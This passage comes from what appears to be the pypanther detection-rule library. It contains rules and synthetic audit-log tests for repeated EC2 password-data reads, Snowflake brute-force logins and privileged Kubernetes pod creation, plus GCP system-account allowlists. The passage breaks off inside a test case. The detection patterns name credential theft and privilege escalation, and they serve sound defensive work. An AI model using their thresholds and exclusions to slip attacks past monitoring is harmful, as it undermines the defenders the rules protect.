from panther_core import PantherEvent

from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.aws import aws_cloudtrail_success, aws_rule_context


@panther_managed
class AWSEC2ManyPasswordReadAttempts(Rule):
    id = "AWS.EC2.ManyPasswordReadAttempts-prototype"
    display_name = "AWS EC2 Many Password Read Attempts"
    log_types = [LogType.AWS_CLOUDTRAIL]
    default_severity = Severity.INFO
    reports = {"MITRE ATT&CK": ["TA0006:T1555"]}
    default_description = "An actor in AWS has made many attempts to retrieve EC2 passwords. It is typically not necessary to retrieve EC2 passwords more than a few times an hour.\n"
    threshold = 3
    default_reference = (
        "https://stratus-red-team.cloud/attack-techniques/AWS/aws.credential-access.ec2-get-password-data/"
    )
    default_runbook = "Identify the actor and the EC2 instances for which the credential access attempts were made. Determine if the attempts have a valid reason."
    tags = [
        "AWS",
        "CloudTrail",
        "EC2",
        "Credential Access:Credentials from Password Stores",
        "Credential Access",
        "Credentials from Password Stores",
        "Beta",
    ]

    def rule(self, event: PantherEvent) -> bool:
        # Raise alert if this is a GetPasswordData event for an EC2 service
        return event.get("eventName") == "GetPasswordData" and event.get("eventSource") == "ec2.amazonaws.com"

    def title(self, event: PantherEvent) -> str:
        actor = event.udm("actor_user")
        return f"{actor} has made multiple requests for EC2 password data in the last hour"

    def dedup(self, event: PantherEvent) -> str:
        # Dedup events based on the principal ID
        return event.udm("actor_user")

    def severity(self, event: PantherEvent) -> str:
        # Return "INFO" severity if the password read attempts are unsuccessful
        if not aws_cloudtrail_success(event):
            return "INFO"
        return "DEFAULT"

    def alert_context(self, event: PantherEvent) -> dict:
        return aws_rule_context(event)

    tests = [
        RuleTest(
            name="Unsuccessful Attempt",
            expected_result=True,
            log={
                "p_event_time": "2024-12-11 21:45:56.000000000",
                "p_log_type": "AWS.CloudTrail",
                "p_parse_time": "2024-12-11 21:50:54.495464364",
                "awsRegion": "us-west-2",
                "errorCode": "Client.UnauthorizedOperation",
                "errorMessage": "You are not authorized to perform this operation. User: arn:aws:sts::111122223333:assumed-role/SampleRole/leroy.jenkins is not authorized to perform: ec2:GetPasswordData on resource: arn:aws:ec2:us-west-2:111122223333:instance/* because no identity-based policy allows the ec2:GetPasswordData action. Encoded authorization failure message: VbdJrM7j1Czq6HEj1lZpnU-AWGICaaPZQs1K_-9U3hQcFpXimBHYHwvg4SOc36ACu0GUYqWoSeX6_wI7ke3QxC0d1_Wv2XYLI96rYdMY2aWzdzwkIp__hUQQi-XqaHmp-QHOHiiJ31xqEkDZvyZXaO0BHhCpf8m7mIMeMaAB2CPtKhPj5NPGGkPc1f6rNFx0grhDkKZ3MrWBo65U4nRjzJrThuyK3146B1k1tWuQfI2_H-QMCuOl_aTIZ93xIeWFoIqKUWnD6-F68V8hhxHHXl0EhiFL9p7LAGvYTPXtJ1wEH1ve8iOW1S9ptI8CuFVP-Q7E7-NS45tIaheVJusaq3JtS03XAnKYC2NuVXnXBwbPNbNiQWH8LfSdgl43MZ5Q9Kin-tqCoA_Yskz0F_JNokjmIB2PKegJ5kANzHcb09u9sSqvgqKqpVHpfIDtjcI8LPzWjZyUNExaymEWOkE4HhtF19t1zyBvuoO6xgZtCyAx-6fsDSO8jpBZbLz9MsPmjhJLfp_yQPOF9ROIrBhvNCY_2tC7hyDDwdl11iNzHQvBaCjiLjE5PcoEchYWTHqlVHZ-yMA3",
                "eventCategory": "Management",
                "eventID": "9e2b3bf0-8f58-4d50-83af-b3175b68c2f8",
                "eventName": "GetPasswordData",
                "eventSource": "ec2.amazonaws.com",
                "eventTime": "2024-12-11 21:45:56.000000000",
                "eventType": "AwsApiCall",
                "eventVersion": "1.10",
                "managementEvent": True,
                "readOnly": True,
                "recipientAccountId": "111122223333",
                "requestID": "b22ce7ac-297f-41b4-a92e-f4aa38668c6d",
                "requestParameters": {"instanceId": "i-abcdef1234567890"},
                "sourceIPAddress": "1.2.3.4",
                "tlsDetails": {
                    "cipherSuite": "TLS_AES_128_GCM_SHA256",
                    "clientProvidedHostHeader": "ec2.us-west-2.amazonaws.com",
                    "tlsVersion": "TLSv1.3",
                },
                "userAgent": "SampleUserAgent",
                "userIdentity": {
                    "accessKeyId": "SAMPLE_ACCESS_KEY",
                    "accountId": "111122223333",
                    "arn": "arn:aws:sts::111122223333:assumed-role/SampleRole/leroy.jenkins",
                    "principalId": "SAMPLE_PRINCIPAL_ID:leroy.jenkins",
                    "sessionContext": {
                        "attributes": {"creationDate": "2024-12-11T21:45:52Z", "mfaAuthenticated": "false"},
                        "sessionIssuer": {
                            "accountId": "111122223333",
                            "arn": "arn:aws:iam::111122223333:role/SampleRole",
                            "principalId": "SAMPLE_PRINCIPAL_ID",
                            "type": "Role",
                            "userName": "SampleRole",
                        },
                    },
                    "type": "AssumedRole",
                },
            },
        ),
        RuleTest(
            name="Successful Attempt",
            expected_result=True,
            log={
                "p_event_time": "2024-11-21 22:46:18.000000000",
                "p_log_type": "AWS.CloudTrail",
                "p_parse_time": "2024-11-21 22:50:54.241713629",
                "awsRegion": "us-west-2",
                "eventCategory": "Management",
                "eventID": "73076737-1a1e-418b-94fd-cbde95a5859d",
                "eventName": "GetPasswordData",
                "eventSource": "ec2.amazonaws.com",
                "eventTime": "2024-11-21 22:46:18.000000000",
                "eventType": "AwsApiCall",
                "eventVersion": "1.10",
                "managementEvent": True,
                "readOnly": True,
                "recipientAccountId": "111122223333",
                "requestID": "6ed17b60-a576-4b71-91d3-b59a37b3c6f9",
                "requestParameters": {"instanceId": "i-abcdef1234567890"},
                "sessionCredentialFromConsole": True,
                "sourceIPAddress": "1.2.3.4",
                "tlsDetails": {
                    "cipherSuite": "TLS_AES_128_GCM_SHA256",
                    "clientProvidedHostHeader": "ec2.us-west-2.amazonaws.com",
                    "tlsVersion": "TLSv1.3",
                },
                "userAgent": "SampleUserAgent",
                "userIdentity": {
                    "accessKeyId": "SAMPLE_ACCESS_KEY",
                    "accountId": "111122223333",
                    "arn": "arn:aws:sts::111122223333:assumed-role/SampleRole/leroy.jenkins",
                    "principalId": "SAMPLE_PRINCIPAL_ID:leroy.jenkins",
                    "sessionContext": {
                        "attributes": {"creationDate": "2024-11-21T22:42:44Z", "mfaAuthenticated": "false"},
                        "sessionIssuer": {
                            "accountId": "111122223333",
                            "arn": "arn:aws:iam::111122223333:role/aws-reserved/sso.amazonaws.com/us-west-2/SampleRole",
                            "principalId": "SAMPLE_PRINCIPAL_ID",
                            "type": "Role",
                            "userName": "SampleRole",
                        },
                    },
                    "type": "AssumedRole",
                },
            },
        ),
        RuleTest(
            name="Unrelated Event",
            expected_result=False,
            log={
                "awsRegion": "us-east-1",
                "eventCategory": "Management",
                "eventID": "044e210e-6c5e-3f3e-8f04-2311a826f287",
                "eventName": "AssumeRole",
                "eventSource": "sts.amazonaws.com",
                "eventTime": "2024-12-12 16:04:32.000000000",
                "eventType": "AwsApiCall",
                "eventVersion": "1.08",
                "managementEvent": "True",
                "readOnly": "True",
                "recipientAccountId": "111122223333",
                "requestID": "82c13187-0cc9-445e-9862-65d3ee2c6b7d",
                "requestParameters": {
                    "durationSeconds": "900",
                    "roleArn": "arn:aws:iam::111122223333:role/SampleRole",
                    "roleSessionName": "SampleSession",
                },
                "resources": [
                    "{'accountId': '111122223333', 'arn': 'arn:aws:iam::111122223333:role/SampleRole', 'type': 'AWS::IAM::Role'}",
                ],
                "responseElements": {
                    "assumedRoleUser": {
                        "arn": "arn:aws:sts::111122223333:assumed-role/SampleRole/SampleSession",
                        "assumedRoleId": "SAMPLE_PRINCIPAL_ID:SampleSession",
                    },
                    "credentials": {
                        "accessKeyId": "SAMPLE_ACCESS_KEY",
                        "expiration": "Dec 12, 2024, 4:19:32 PM",
                        "sessionToken": "SampleSessionToken",
                    },
                },
                "sharedEventID": "fe4784a8-b3b8-4dac-a763-0476f4bef6e3",
                "sourceIPAddress": "1.2.3.4",
                "tlsDetails": {
                    "cipherSuite": "TLS_AES_128_GCM_SHA256",
                    "clientProvidedHostHeader": "sts.us-east-1.amazonaws.com",
                    "tlsVersion": "TLSv1.3",
                },
                "userAgent": "SampleUserAgent",
                "userIdentity": {
                    "accountId": "111122223333",
                    "principalId": "SAMPLE_PRINCIPAL_ID:lambda-name",
                    "type": "AWSAccount",
                },
            },
        ),
    ]



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed


@panther_managed
class SnowflakeStreamBruteForceByIp(Rule):
    id = "Snowflake.Stream.BruteForceByIp-prototype"
    display_name = "Snowflake Brute Force Attacks by IP"
    log_types = [LogType.SNOWFLAKE_LOGIN_HISTORY]
    default_severity = Severity.MEDIUM
    reports = {"MITRE ATT&CK": ["TA0006:T1110"]}
    default_description = "Detect brute force attacks by monitorign failed logins from the same IP address"
    threshold = 5
    tags = ["Snowflake", "[MITRE] Credential Access", "[MITRE] Brute Force"]

    def rule(self, event):
        # Return true for any login attempt; Let Panther's dedup and threshold handle the brute force
        #   detection.
        # ^^ OVERFLOW_FAILURE_EVENTS_ELIDED are placeholder logs -> no point in alerting
        return (
            event.get("EVENT_TYPE") == "LOGIN"
            and event.get("IS_SUCCESS") == "NO"
            and (event.get("ERROR_MESSAGE") != "OVERFLOW_FAILURE_EVENTS_ELIDED")
        )

    def title(self, event):
        return (
            f"Login attempts from IP {event.get('CLIENT_IP', '<UNKNOWN IP>')} have exceeded the failed logins threshold"
        )

    def severity(self, event):
        # If the error appears to be caused by an automation issue, downgrade to INFO
        common_errors = {"JWT_TOKEN_INVALID_PUBLIC_KEY_FINGERPRINT_MISMATCH"}
        if event.get("ERROR_MESSAGE") in common_errors:
            return "INFO"
        return "DEFAULT"

    def dedup(self, event):
        return event.get("CLIENT_IP", "<UNKNOWN IP>") + event.get("REPORTED_CLIENT_TYPE", "<UNKNOWN CLIENT TYPE>")

    tests = [
        RuleTest(
            name="Successful Login",
            expected_result=False,
            log={
                "p_event_time": "2024-10-08 14:38:46.061000000",
                "p_log_type": "Snowflake.LoginHistory",
                "p_source_label": "Snowflake Prod",
                "CLIENT_IP": "1.1.1.1",
                "EVENT_ID": "393754014361778",
                "EVENT_TIMESTAMP": "2024-10-08 14:38:46.061000000",
                "EVENT_TYPE": "LOGIN",
                "FIRST_AUTHENTICATION_FACTOR": "PASSWORD",
                "IS_SUCCESS": "YES",
                "RELATED_EVENT_ID": "0",
                "REPORTED_CLIENT_TYPE": "OTHER",
                "REPORTED_CLIENT_VERSION": "1.11.1",
                "USER_NAME": "ckent@dailyplanet.org",
            },
        ),
        RuleTest(
            name="Unsuccessful Login",
            expected_result=True,
            log={
                "p_event_time": "2024-10-08 14:38:46.061000000",
                "p_log_type": "Snowflake.LoginHistory",
                "p_source_label": "Snowflake Prod",
                "CLIENT_IP": "1.2.3.4",
                "EVENT_ID": "393754014361778",
                "EVENT_TIMESTAMP": "2024-10-08 14:38:46.061000000",
                "EVENT_TYPE": "LOGIN",
                "FIRST_AUTHENTICATION_FACTOR": "PASSWORD",
                "IS_SUCCESS": "NO",
                "RELATED_EVENT_ID": "0",
                "REPORTED_CLIENT_TYPE": "OTHER",
                "REPORTED_CLIENT_VERSION": "1.11.1",
                "USER_NAME": "luthor@lexcorp.com",
            },
        ),
        RuleTest(
            name="Unsuccessful Login due to Invalid JWT Fingerprint",
            expected_result=True,
            log={
                "p_event_time": "2024-10-08 14:38:46.061000000",
                "p_log_type": "Snowflake.LoginHistory",
                "p_source_label": "Snowflake Prod",
                "CLIENT_IP": "1.2.3.4",
                "ERROR_CODE": 394304,
                "ERROR_MESSAGE": "JWT_TOKEN_INVALID_PUBLIC_KEY_FINGERPRINT_MISMATCH",
                "EVENT_ID": "393754014361778",
                "EVENT_TIMESTAMP": "2024-10-08 14:38:46.061000000",
                "EVENT_TYPE": "LOGIN",
                "FIRST_AUTHENTICATION_FACTOR": "PASSWORD",
                "IS_SUCCESS": "NO",
                "RELATED_EVENT_ID": "0",
                "REPORTED_CLIENT_TYPE": "OTHER",
                "REPORTED_CLIENT_VERSION": "1.11.1",
                "USER_NAME": "luthor@lexcorp.com",
            },
        ),
        RuleTest(
            name="Overflow Failure",
            expected_result=False,
            log={
                "p_event_time": "2024-11-15 00:12:24.288000000",
                "p_log_type": "Snowflake.LoginHistory",
                "p_parse_time": "2024-11-15 02:46:25.862374468",
                "CLIENT_IP": "0.0.0.0",
                "ERROR_CODE": 390156,
                "ERROR_MESSAGE": "OVERFLOW_FAILURE_EVENTS_ELIDED",
                "EVENT_ID": "16592193114297018",
                "EVENT_TIMESTAMP": "2024-11-15 00:12:24.288000000",
                "EVENT_TYPE": "LOGIN",
                "IS_SUCCESS": "NO",
                "RELATED_EVENT_ID": "0",
                "REPORTED_CLIENT_TYPE": "OTHER",
                "REPORTED_CLIENT_VERSION": "0",
                "USER_NAME": "luthor@lexcorp.com",
            },
        ),
    ]



"""
Used to define global helpers and variables for Okta events.
"""

from pypanther.helpers.base import pantherflow_investigation


def okta_alert_context(event):
    """Returns common context for automation of Okta alerts"""
    return {
        "event_type": event.get("eventtype", ""),
        "severity": event.get("severity", ""),
        "actor": event.get("actor", {}),
        "client": event.get("client", {}),
        "request": event.get("request", {}),
        "outcome": event.get("outcome", {}),
        "target": event.get("target", []),
        "debug_context": event.get("debugcontext", {}),
        "authentication_context": event.get("authenticationcontext", {}),
        "security_context": event.get("securitycontext", {}),
        "ips": event.get("p_any_ip_addresses", []),
        "PantherFlow Investigation": pantherflow_investigation(event),
    }



"""
get_info, get_k8s_info, get_flow_logs_info etc return dicts of the most commonly used fields.
"""

import re


def get_info(event):
    fields = {
        "principal": "protoPayload.authenticationInfo.principalEmail",
        "project_id": "protoPayload.resource.labels.project_id",
        "caller_ip": "protoPayload.requestMetadata.callerIP",
        "user_agent": "protoPayload.requestMetadata.callerSuppliedUserAgent",
        "method_name": "protoPayload.methodName",
    }
    return {name: event.deep_get(*(path.split("."))) for name, path in fields.items()}


def get_k8s_info(event):
    """
    Get GCP K8s info such as pod, authorized user etc.
    return a tuple of strings
    """
    pod_slug = event.deep_get("protoPayload", "resourceName")
    # core/v1/namespaces/<namespace>/pods/<pod-id>/<action>
    _, _, _, namespace, _, pod, _ = pod_slug.split("/")
    return get_info(event) | {"namespace": namespace, "pod": pod}


def get_flow_log_info(event):
    fields = {
        "src_ip": "jsonPayload.connection.src_ip",
        "dest_ip": "jsonPayload.connection.dest_ip",
        "src_port": "jsonPayload.connection.src_port",
        "dest_port": "jsonPayload.connection.dest_port",
        "protocol": "jsonPayload.connection.protocol",
        "bytes_sent": "jsonPayload.bytes_sent",
        "reporter": "jsonPayload.reporter",
    }
    return {name: event.deep_get(*(path.split("."))) for name, path in fields.items()}


def gcp_alert_context(event):
    return {
        "project": event.deep_get("resource", "labels", "project_id", default=""),
        "principal": event.deep_get(
            "protoPayload",
            "authenticationInfo",
            "principalEmail",
            default="",
        ),
        "caller_ip": event.deep_get("protoPayload", "requestMetadata", "callerIP", default=""),
        "methodName": event.deep_get("protoPayload", "methodName", default=""),
        "resourceName": event.deep_get("protoPayload", "resourceName", default=""),
        "serviceName": event.deep_get("protoPayload", "serviceName", default=""),
    }


def get_binding_deltas(event):
    """
    A GCP helper function to return the binding deltas from audit events

    Binding deltas provide context on a permission change, including the
    action, role, and member associated with the request.
    """
    if event.get("protoPayload", {}).get("methodName") != "SetIamPolicy":
        return []

    service_data = event.get("protoPayload", {}).get("serviceData")
    if not service_data:
        return []

    binding_deltas = service_data.get("policyDelta", {}).get("bindingDeltas")
    if not binding_deltas:
        return []
    return binding_deltas


# GKE/K8s Security Exclusions
# Well-known GCP service accounts that legitimately perform privileged operations
# Reference: https://cloud.google.com/kubernetes-engine/docs/concepts/service-accounts
# Reference:
# https://cloud.google.com/kubernetes-engine/docs/how-to/hardening-your-cluster#restrict_pod_creation
#
# SECURITY NOTE: These patterns must be as specific as possible to prevent attackers
# from creating accounts that match these patterns. Use full prefixes and suffixes where possible.
GKE_SYSTEM_SERVICE_ACCOUNT_PREFIXES = [
    # Kubernetes system accounts (exact match)
    "system:kube-controller-manager",
    "system:kube-scheduler",
    "system:addon-manager",
    "system:serviceaccount:kube-system:",
    "system:serviceaccount:kube-public:",
    "system:serviceaccount:kube-node-lease:",
    "system:serviceaccount:gke-system:",
    "system:serviceaccount:gke-managed-system:",
    "system:serviceaccount:gmp-system:",
    "system:serviceaccount:gmp-public:",
    "system:serviceaccount:config-management-system:",
    "system:serviceaccount:istio-system:",
    "system:serviceaccount:asm-system:",
]

# GCP project-specific service account patterns that require regex matching
# These will be matched against the full email pattern
GKE_SYSTEM_SERVICE_ACCOUNT_PATTERNS = [
    # GKE service accounts - must be in a numeric project ID
    re.compile(r"^[\d]+-compute@developer\.gserviceaccount\.com$"),
    re.compile(r"^container-engine-robot@.*\.iam\.gserviceaccount\.com$"),
    re.compile(r"^gke-[\d]+@.*\.iam\.gserviceaccount\.com$"),
    # GCP managed service accounts
    re.compile(r"^service-[\d]+@container-engine-robot\.iam\.gserviceaccount\.com$"),
    re.compile(r"^service-[\d]+@containerregistry\.iam\.gserviceaccount\.com$"),
    re.compile(r"^[\d]+@cloudservices\.gserviceaccount\.com$"),
    # Workload identity service accounts
    re.compile(r"^.*\.svc\.id\.goog\[kube-system/.*\]$"),
    re.compile(r"^.*\.svc\.id\.goog\[gke-system/.*\]$"),
    re.compile(r"^.*\.svc\.id\.goog\[gke-managed-system/.*\]$"),
]

# System namespaces where privileged pods are expected
# Reference: https://cloud.google.com/kubernetes-engine/docs/concepts/namespaces
# Reference: https://kubernetes.io/docs/concepts/security/pod-security-standards/
GKE_SYSTEM_NAMESPACES = [
    "kube-system",
    "kube-public",
    "kube-node-lease",
    "gke-system",
    "gke-managed-system",
    "gmp-system",  # Google Managed Prometheus
    "gmp-public",
    "config-management-system",  # Anthos Config Management
    "istio-system",  # Istio service mesh
    "asm-system",  # Anthos Service Mesh
]


def is_gke_system_principal(principal_email):
    """
    Check if the actor is a well-known GKE/GCP system service account.

    This function uses strict pattern matching to prevent false negatives where
    an attacker might create an account with system-like names
    (e.g., "kubernetes-attacker@evil.com").

    Args:
    ----
        principal_email: The email/identifier of the principal performing the action

    Returns:
    -------
        bool: True if this is a known system service account, False otherwise

    Reference: https://cloud.google.com/iam/docs/service-accounts#default

    Security Note: This function uses exact prefix matching and regex patterns to ensure
    only legitimate GCP/GKE service accounts are excluded, preventing attackers from
    bypassing detection by including system keywords in their account names.

    """
    if not principal_email:
        return False

    # Check for exact prefix matches (Kubernetes system accounts)
    for prefix in GKE_SYSTEM_SERVICE_ACCOUNT_PREFIXES:
        if principal_email.startswith(prefix):
            return True

    # Check for exact matches against regex patterns (GCP service accounts)
    for pattern in GKE_SYSTEM_SERVICE_ACCOUNT_PATTERNS:
        if pattern.match(principal_email):
            return True

    return False


def is_gke_system_namespace(resource_name):
    """
    Check if a K8s resource is in a GKE system namespace.

    System namespaces are managed by GKE and typically require privileged access
    for core Kubernetes functionality.

    Args:
    ----
        resource_name: The full resource name from the GCP audit log
                      (e.g., "core/v1/namespaces/kube-system/pods/my-pod")

    Returns:
    -------
        bool: True if the resource is in a system namespace, False otherwise

    """
    if not resource_name:
        return False

    # Extract namespace from resource name (format: core/v1/namespaces/<namespace>/...)
    parts = resource_name.split("/")
    if len(parts) >= 4 and parts[2] == "namespaces":
        namespace = parts[3]
        return namespace in GKE_SYSTEM_NAMESPACES
    return False



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.base import deep_get
from pypanther.helpers.gcp import gcp_alert_context, is_gke_system_namespace, is_gke_system_principal


@panther_managed
class GCPK8SPrivilegedPodCreated(Rule):
    id = "GCP.K8S.Privileged.Pod.Created-prototype"
    display_name = "GCP K8S Privileged Pod Created"
    log_types = [LogType.GCP_AUDIT_LOG]
    default_severity = Severity.HIGH
    default_description = "Alerts when a user creates privileged pod. These particular pods have full access to the host’s namespace and devices, have the ability to exploit the kernel, have dangerous linux capabilities, and can be a powerful launching point for further attacks. In the event of a successful container escape where a user is operating with root privileges, the attacker retains this role on the node.\n"
    default_runbook = "Investigate the reason of creating privileged pod. Advise that it is discouraged practice. Create ticket if appropriate.\n"
    default_reference = "https://www.golinuxcloud.com/kubernetes-privileged-pod-examples/"
    reports = {"MITRE ATT&CK": ["TA0004:T1548"]}
    dedup_period_minutes = 360

    def rule(self, event):
        # Check basic conditions that would exclude this event
        if (
            event.deep_get("protoPayload", "response", "status") == "Failure"
            or event.deep_get("protoPayload", "methodName") != "io.k8s.core.v1.pods.create"
        ):
            return False
        # Check if this is a known service account or system namespace that should be excluded
        principal_email = event.deep_get("protoPayload", "authenticationInfo", "principalEmail", default="")
        resource_name = event.deep_get("protoPayload", "resourceName", default="")
        if is_gke_system_principal(principal_email) or is_gke_system_namespace(resource_name):
            return False
        # Check for privileged pod creation
        authorization_info = event.deep_walk("protoPayload", "authorizationInfo")
        if not authorization_info:
            return False
        containers_info = event.deep_walk("protoPayload", "response", "spec", "containers")
        for auth in authorization_info:
            if auth.get("permission") == "io.k8s.core.v1.pods.create" and auth.get("granted") is True:
                for security_context in containers_info:
                    # Check for privileged pods and pods running as root
                    # Reference:
                    # https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted
                    if (
                        deep_get(security_context, "securityContext", "privileged") is True
                        or deep_get(security_context, "securityContext", "runAsNonRoot") is False
                    ):
                        return True
        return False

    def title(self, event):
        actor = event.deep_get("protoPayload", "authenticationInfo", "principalEmail", default="<ACTOR_NOT_FOUND>")
        pod_name = event.deep_get("protoPayload", "resourceName", default="<RESOURCE_NOT_FOUND>")
        project_id = event.deep_get("resource", "labels", "project_id", default="<PROJECT_NOT_FOUND>")
        return f"[GCP]: [{actor}] created a privileged pod [{pod_name}] in project [{project_id}]"

    def dedup(self, event):
        return event.deep_get("protoPayload", "authenticationInfo", "principalEmail", default="<ACTOR_NOT_FOUND>")

    def alert_context(self, event):
        context = gcp_alert_context(event)
        containers_info = event.deep_walk("protoPayload", "response", "spec", "containers", default=[])
        context["pod_security_context"] = [i.get("securityContext") for i in containers_info]
        return context

    tests = [
        RuleTest(
            name="Privileged Pod Created",
            expected_result=True,
            log={
                "logName": "projects/some-project/logs/cloudaudit.googleapis.com%2Factivity",
                "operation": {},
                "protoPayload": {
                    "at_sign_type": "type.googleapis.com/google.cloud.audit.AuditLog",
                    "authenticationInfo": {"principalEmail": "john.doe@company.com"},
                    "authorizationInfo": [
                        {
                            "granted": True,
                            "permission": "io.k8s.core.v1.pods.create",
                            "resource": "core/v1/namespaces/default/pods/test-privileged-pod",
                        },
                    ],
                    "methodName": "io.k8s.core.v1.pods.create",
                    "request": {
                        "@type": "core.k8s.io/v1.Pod",
                        "apiVersion": "v1",
                        "kind": "Pod",
                        "metadata": {"name": "test-privileged-pod", "namespace": "default"},
                        "spec": {
                            "containers": [
                                {
                                    "image": "nginx",
                                    "imagePullPolicy": "Always",
                                    "name": "nginx",
                                    "resources": {},
                                    "securityContext": {"privileged": True},
                                },
                            ],
                            "securityContext": {},
                        },
                        "status": {},
                    },
                    "requestMetadata": {"callerIP": "1.2.3.4"},
                    "resourceName": "core/v1/namespaces/default/pods/test-privileged-pod",
                    "response": {
                        "@type": "core.k8s.io/v1.Pod",
                        "apiVersion": "v1",
                        "kind": "Pod",
                        "metadata": {},
                        "spec": {
                            "containers": [
                                {
                                    "image": "nginx",
                                    "imagePullPolicy": "Always",
                                    "name": "nginx",
                                    "resources": {},
                                    "securityContext": {"privileged": True},
                                },
                            ],
                            "securityContext": {},
                            "serviceAccount": "default",
                            "serviceAccountName": "default",
                            "terminationGracePeriodSeconds": 30,
                        },
                        "status": {},
                    },
                    "serviceName": "k8s.io",
                    "status": {},
                },
                "receiveTimestamp": "2024-02-13 12:45:20.058795785",
                "resource": {
                    "labels": {
                        "cluster_name": "some-project-cluster",
                        "location": "us-west1",
                        "project_id": "some-project",
                    },
                    "type": "k8s_cluster",
                },
                "timestamp": "2024-02-13 12:45:06.073905000",
            },
        ),
        RuleTest(
            name="Run-As-Root Pod Created",
            expected_result=True,
            log={
                "logName": "projects/some-project/logs/cloudaudit.googleapis.com%2Factivity",
                "operation": {},
                "protoPayload": {
                    "at_sign_type": "type.googleapis.com/google.cloud.audit.AuditLog",
                    "authenticationInfo": {"principalEmail": "john.doe@company.com"},
                    "authorizationInfo": [
                        {
                            "granted": True,
                            "permission": "io.k8s.core.v1.pods.create",
                            "resource": "core/v1/namespaces/default/pods/test-runasroot-pod",
                        },
                    ],
                    "methodName": "io.k8s.core.v1.pods.create",
                    "request": {
                        "@type": "core.k8s.io/v1.Pod",
                        "apiVersion": "v1",
                        "kind": "Pod",
                        "metadata": {},
                        "spec": {
                            "containers": [
                                {
                                    "image": "nginx",
                                    "imagePullPolicy": "Always",
                                    "name": "nginx",
                                    "resources": {},
                                    "securityContext": {"runAsNonRoot": False},
                                },
                            ],
                        },
                        "status": {},
                    },
                    "requestMetadata": {"callerIP": "1.2.3.4"},
                    "resourceName": "core/v1/namespaces/default/pods/test-runasroot-pod",
                    "response": {
                        "@type": "core.k8s.io/v1.Pod",
                        "apiVersion": "v1",
                        "kind": "Pod",
                        "metadata": {},
                        "spec": {
                            "containers": [
                                {
                                    "image": "nginx",
                                    "imagePullPolicy": "Always",
                                    "name": "nginx",
                                    "resources": {},
                                    "securityContext": {"runAsNonRoot": False},
                                },
                            ],
                        },
                        "status": {"phase": "Pending", "qosClass": "BestEffort"},
                    },
                    "serviceName": "k8s.io",
                    "status": {},
                },
                "receiveTimestamp": "2024-02-13 13:13:53.113465457",
                "resource": {
                    "labels": {
                        "cluster_name": "some-project-cluster",
                        "location": "us-west1",
                        "project_id": "some-project",
                    },
                    "type": "k8s_cluster",
                },
                "timestamp": "2024-02-13 13:13:45.363388000",
            },
        ),
        RuleTest(
            name="Non-Privileged Pod Created",
            expected_result=False,
            log={
                "logName": "projects/some-project/logs/cloudaudit.googleapis.com%2Factivity",
                "operation": {
                    "first": True,
                    "id": "7f8c5bec-01ff-4079-97e3-065ac34e10e8",
                    "last": True,
                    "producer": "k8s.io",
                },
                "protoPayload": {
                    "at_sign_type": "type.googleapis.com/google.cloud.audit.AuditLog",
                    "authenticationInfo": {"principalEmail": "john.doe@company.com"},
                    "authorizationInfo": [
                        {
                            "granted": True,
                            "permission": "io.k8s.core.v1.pods.create",
                            "resource": "core/v1/namespaces/default/pods/test-non-privileged-pod",
                        },
                    ],
                    "methodName": "io.k8s.core.v1.pods.create",
                    "request": {
                        "@type": "core.k8s.io/v1.Pod",
                        "apiVersion": "v1",
                        "kind": "Pod",
                        "metadata": {"name": "test-non-privileged-pod", "namespace": "default"},
                        "spec": {
                            "containers": [
                                {"image": "nginx", "imagePullPolicy": "Always", "name": "nginx", "resources": {}},
                            ],
                        },
                        "status": {},
                    },
                    "requestMetadata": {"callerIP": "1.2.3.4"},
                    "resourceName": "core/v1/namespaces/default/pods/test-non-privileged-pod",
                    "response": {
                        "@type": "core.k8s.io/v1.Pod",
                        "apiVersion": "v1",
                        "kind": "Pod",
                        "metadata": {},
                        "spec": {
                            "containers": [
                                {"image": "nginx", "imagePullPolicy": "Always", "name": "nginx", "resources": {}},
                            ],
                        },
                        "status": {},
                    },
                    "serviceName": "k8s.io",
                    "status": {},
                },
                "receiveTimestamp": "2024-02-13 13:07:54.642331675",
                "resource": {
                    "labels": {
                        "cluster_name": "some-project-cluster",
                        "location": "us-west1",
                        "project_id": "some-project",
                    },
                    "type": "k8s_cluster",
                },
                "timestamp": "2024-02-13 13:07:29.505948000",
            },
        ),
        RuleTest(
            name="Error Creating Pod",
            expected_result=False,
            log={
                "logName": "projects/some-project/logs/cloudaudit.googleapis.com%2Factivity",
                "protoPayload": {
                    "at_sign_type": "type.googleapis.com/google.cloud.audit.AuditLog",
                    "authenticationInfo": {"principalEmail": "john.doe@company.com"},
                    "authorizationInfo": [
                        {
                            "granted": True,
                            "permission": "io.k8s.core.v1.pods.create",
                            "resource": "core/v1/namespaces/default/pods/test-privileged-pod",
                        },
                    ],
                    "methodName": "io.k8s.core.v1.pods.create",
                    "request": {
                        "@type": "core.k8s.io/v1.Pod",
                        "apiVersion": "v1",
                        "kind": "Pod",
                        "metadata": {"name": "test-privileged-pod", "namespace": "default"},
                        "spec": {
                            "containers": [
                                {
                                    "image": "nginx",
                                    "imagePullPolicy": "Always",
                                    "name": "nginx",
                                    "resources": {},
                                    "securityContext": {"runAsNonRoot": False},
                                },
                            ],
                        },
                        "status": {},
                    },
                    "requestMetadata": {"callerIP": "1.2.3.4"},
                    "resourceName": "core/v1/namespaces/default/pods/test-privileged-pod",
                    "response": {
                        "@type": "core.k8s.io/v1.Status",
                        "apiVersion": "v1",
                        "code": 409,
                        "details": {"kind": "pods", "name": "test-privileged-pod"},
                        "kind": "Status",
                        "message": 'pods "test-privileged-pod" already exists',
                        "metadata": {},
                        "reason": "AlreadyExists",
                        "status": "Failure",
                    },
                    "serviceName": "k8s.io",
                    "status": {"code": 10, "message": 'pods "test-privileged-pod" already exists'},
                },
                "receiveTimestamp": "2024-02-13 13:13:33.486605432",
                "resource": {
                    "labels": {
                        "cluster_name": "some-project-cluster",
                        "location": "us-west1",
                        "project_id": "some-project",
                    },
                    "type": "k8s_cluster",
                },
                "timestamp": "2024-02-13 13:13:24.079140000",
            },
        ),
        RuleTest(
            name="GCP Service Account Creating Privileged Pod (Excluded)",
            expected_result=False,
            log={
                "logName": "projects/some-project/logs/cloudaudit.googleapis.com%2Factivity",
                "operation": {},
                "protoPayload": {
                    "at_sign_type": "type.googleapis.com/google.cloud.audit.AuditLog",
                    "authenticationInfo": {
                        "principalEmail": "container-engine-robot@some-project.iam.gserviceaccount.com",
                    },
                    "authorizationInfo": [
                        {
                            "granted": True,
                            "permission": "io.k8s.core.v1.pods.create",
